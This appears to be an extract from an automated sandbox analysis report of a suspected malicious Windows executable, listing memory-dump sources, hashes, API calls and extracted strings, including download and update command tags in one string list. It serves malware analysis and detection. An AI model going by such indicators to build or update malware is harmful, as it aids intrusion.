                                                                                                        • Instruction ID: 6b69725bd05981cd4f4254b861b6f387a1105d50d47278b0a44373271c0cda1d
                                                                                                        • Opcode Fuzzy Hash: 16aa36c36c07788c21fc9370e57e2145679faf2e65c7b8ca0f6b60299a72feaf
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2124ffb204b7cba6620bba2ff3228177161deb86735488ededb9eae7225ee43b
                                                                                                        • Instruction ID: 1ef7f0f18edf56d9ef90e2a0500267e754089c314ceecaf6e3199b378cf7b346
                                                                                                        • Opcode Fuzzy Hash: 2124ffb204b7cba6620bba2ff3228177161deb86735488ededb9eae7225ee43b
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8d4566042fc1d142aaa198f65e425857dfbaf1ce5c949d0fb43ada26825f9b4
                                                                                                        • Instruction ID: af621cf70d0426f8c3a49c55e54f7066fa0ee2540949c153a8f93401d5099a26
                                                                                                        • Opcode Fuzzy Hash: e8d4566042fc1d142aaa198f65e425857dfbaf1ce5c949d0fb43ada26825f9b4
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0679f55680d96bf1fd1ca55bee239abd9dfd2f4aad960765a12eda4c4a0f1a1
                                                                                                        • Instruction ID: f51fc750af968488f8b2bd891ce3ee8696d2999f34cc3011250d5bf544ddf20d
                                                                                                        • Opcode Fuzzy Hash: b0679f55680d96bf1fd1ca55bee239abd9dfd2f4aad960765a12eda4c4a0f1a1
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d915cec1e109bf75949e27d52f9b3549c4b84b11245a8a0b47fa8a7117b99de7
                                                                                                        • Instruction ID: 301d9e1f5453a8dbfa29d3b35b4280b89f3a0e5a51d18c8ae0bdc47fbcc6d266
                                                                                                        • Opcode Fuzzy Hash: d915cec1e109bf75949e27d52f9b3549c4b84b11245a8a0b47fa8a7117b99de7
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4adb971606b6b1d418fa1bd70c5a1e9ab9782178aa006c7f3056fc18b0c303f9
                                                                                                        • Instruction ID: 1b27608b76121da5e6d561301fe4b33a4540e571e59f8c13a2ad61f568198edf
                                                                                                        • Opcode Fuzzy Hash: 4adb971606b6b1d418fa1bd70c5a1e9ab9782178aa006c7f3056fc18b0c303f9
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 522efa4cf538315d46ba45074545b7bb34d7d534754fa276639324e78a1233da
                                                                                                        • Instruction ID: 96db7f6bb9e48ca15a925a6da673b516e66383ea4ad77f523ad0af2d6b816fa0
                                                                                                        • Opcode Fuzzy Hash: 522efa4cf538315d46ba45074545b7bb34d7d534754fa276639324e78a1233da
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dc090e626f5abbcfa577b3832add54e5e18a4b6c8a6473e520f7e323632e9d46
                                                                                                        • Instruction ID: d5a3c1eeea24ff5922e4f0847014e706afb1ac71b4117863ac0101192175257a
                                                                                                        • Opcode Fuzzy Hash: dc090e626f5abbcfa577b3832add54e5e18a4b6c8a6473e520f7e323632e9d46
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 93aeb139fc75136d584516547ec90c1a7201cbf88b337d3a611b2aa4c5a34d86
                                                                                                        • Instruction ID: 5dcfd9161acb356cc535644a779726bed78277c0aa3eb3982b114540ff60a218
                                                                                                        • Opcode Fuzzy Hash: 93aeb139fc75136d584516547ec90c1a7201cbf88b337d3a611b2aa4c5a34d86
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 29891e85c5f3be88c70317cc553adcba21669944b23ad51ab0aeb2c42974d72e
                                                                                                        • Instruction ID: 16cf8f90f87d031daeee758085555acdeb24783270cf672fe8c65465cb1e3e53
                                                                                                        • Opcode Fuzzy Hash: 29891e85c5f3be88c70317cc553adcba21669944b23ad51ab0aeb2c42974d72e
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7da555d45efa8af55388d6c3d378d3354ddb8fdd70bbfaf95c55e775d0a28dca
                                                                                                        • Instruction ID: 10c550fbd9229cf96c1dff6d9bab156985bf26377095e280a6ce7cfe4320d296
                                                                                                        • Opcode Fuzzy Hash: 7da555d45efa8af55388d6c3d378d3354ddb8fdd70bbfaf95c55e775d0a28dca
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 26730b660d2e304f597c8855c3d2771eb9d86c2cde1ca231b07fac8d22a6b77a
                                                                                                        • Instruction ID: d85bd8c83f656e9ca1ce39787ea6acaeb766ff16fe5877427c6a4cf4fbba7f06
                                                                                                        • Opcode Fuzzy Hash: 26730b660d2e304f597c8855c3d2771eb9d86c2cde1ca231b07fac8d22a6b77a
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3053371c1264d650bb4c0ab1ea0bdf64f679a26ec0b4049b6fd14da669291a79
                                                                                                        • Instruction ID: c9e8a8959ff50ed1cf533c8c030bcdeb7e2f4d9a253fe06341b4882825ff28c2
                                                                                                        • Opcode Fuzzy Hash: 3053371c1264d650bb4c0ab1ea0bdf64f679a26ec0b4049b6fd14da669291a79
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fe3c0b30eb8d94b5da75ef3d734b5dbaa9252c58547207e5828762b18541faf1
                                                                                                        • Instruction ID: 6e63ef74f6021bb875867478ba44279e30092e59f9403e3a79eb83d4b789ca96
                                                                                                        • Opcode Fuzzy Hash: fe3c0b30eb8d94b5da75ef3d734b5dbaa9252c58547207e5828762b18541faf1
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6f75f6d149c6789c964d1eba893abd607f6f0fcca0baf76df3ae8239d7ff8465
                                                                                                        • Instruction ID: 6593d0d2c5766726df453f2bfe949c33b9b45748d78c145b5bf39ef0d4837f61
                                                                                                        • Opcode Fuzzy Hash: 6f75f6d149c6789c964d1eba893abd607f6f0fcca0baf76df3ae8239d7ff8465
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7a49a0691703c825fc15a2a0bb35a15769c0aa0e1e461a8bd70d4a81ecc60781
                                                                                                        • Instruction ID: 1ecba99e51b79f2e4b5fe16431abe604f430e5eab2203afeb81f295f9a9c067c
                                                                                                        • Opcode Fuzzy Hash: 7a49a0691703c825fc15a2a0bb35a15769c0aa0e1e461a8bd70d4a81ecc60781
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1542c20f5a946d28757e67d81836a07ea8bfb4e72852dc3d74953d00abfe9493
                                                                                                        • Instruction ID: af97d66baa926c4f3b8f2d6a71a23bf1c0bdeb5c1116af93e0ce12bc0038bf95
                                                                                                        • Opcode Fuzzy Hash: 1542c20f5a946d28757e67d81836a07ea8bfb4e72852dc3d74953d00abfe9493
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 712a3c41954c8da71f6cdc63798a3ec9dfa2106d307f6f6a6e59cf255c2a0253
                                                                                                        • Instruction ID: a4ddb001f86246ba3252c09486fca5b38db6262908142a2763978cf5694168f1
                                                                                                        • Opcode Fuzzy Hash: 712a3c41954c8da71f6cdc63798a3ec9dfa2106d307f6f6a6e59cf255c2a0253
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5a05fe18d94f5f66407e50e0e4ce595f45842f7cd5006ce385dce1f8a05b0d1e
                                                                                                        • Instruction ID: ebd370688337e4557e15acfda9d3f2c1353b0170eab303a38c3b67467cc77620
                                                                                                        • Opcode Fuzzy Hash: 5a05fe18d94f5f66407e50e0e4ce595f45842f7cd5006ce385dce1f8a05b0d1e
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c782202e52284e1f6a4b85a868a9c5ef52240ae23a1a723c8afd627de1e4976
                                                                                                        • Instruction ID: 08b6d35e115b65ed0b7768c02b28806b0881dce5eecf8bd622fcb9f2c166de00
                                                                                                        • Opcode Fuzzy Hash: 7c782202e52284e1f6a4b85a868a9c5ef52240ae23a1a723c8afd627de1e4976
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 042bf4bc140b9be748272c86524181631b1c4e9709d7cfcd25339302dd75a0e4
                                                                                                        • Instruction ID: 56f33b490e515c1991850dd86d6e67e063f42b303bda0fae1f6c30a8309d5876
                                                                                                        • Opcode Fuzzy Hash: 042bf4bc140b9be748272c86524181631b1c4e9709d7cfcd25339302dd75a0e4
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 00430E9D
                                                                                                          • Part of subcall function 00430E68: GetProcAddress.KERNEL32(00000000), ref: 00430E81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                        • Opcode ID: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                                                                        • Instruction ID: 5ce11bf3dff7dcbac6806bf9111ba2700e275f1f76bf181bd05fd63e8e9933b9
                                                                                                        • Opcode Fuzzy Hash: 07f03f934f66e97b2c45f9c5f993f71570d5753330354a292757c734cf32809f
                                                                                                        • Instruction Fuzzy Hash: 6C41426268434C5B2744676E75224677BDCD25CB00FA0F72FF004CBBA5CB3DA8459A2D
                                                                                                        APIs
                                                                                                        • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                                                                        • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                                                                        • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                                                                        • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 1416857345-3736581797
                                                                                                        • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                                                                        • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                                                                        APIs
                                                                                                        • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00428E78
                                                                                                        • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00428E84
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00428E93
                                                                                                        • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00428E9F
                                                                                                        • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00428EB7
                                                                                                        • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00428EDB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 1416857345-3736581797
                                                                                                        • Opcode ID: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction ID: 0f80b1c64b84514455e222d2f54a119e3207b81848e91510e66230f79eecabad
                                                                                                        • Opcode Fuzzy Hash: a0c4300bfbfce01dba4a9a36cbc53bb4e5be3e048a5ceb691434af11cdb608cb
                                                                                                        • Instruction Fuzzy Hash: 20110A70302325AFE7109F65EC42B6FB7A9EF55710FA1402FF940DB281DEB859408BA8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                        • API String ID: 0-954089795
                                                                                                        • Opcode ID: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                                                                        • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                        • Opcode Fuzzy Hash: 1181e68c7420e5035b17eaba7e5189add56abfe16e2305f94e673cf54d2d3152
                                                                                                        • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                        • Opcode ID: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                                                                        • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                                                                        • Opcode Fuzzy Hash: 79201f3f7c0f6db5aab56cbcec8dbd302e1c5a467d6b75af3be145713cf87dc5
                                                                                                        • Instruction Fuzzy Hash: B1617F30B001289BDB00EBB9FD516DE7AB6AB88304FD1907BB101DB346DA3DD949975D
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000000,0042FB77,?,?,00000000,00000000), ref: 0042F8E2
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                        • Opcode ID: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
                                                                                                        • Instruction ID: 197d17d46539fea116ba07fa9f83ce9cdf8d1f815eb4acb174e747f36b05566f
                                                                                                        • Opcode Fuzzy Hash: b85ed9dfc967aef72133f11f1de50f4a52934c066246e20b852cc72a297c83f8
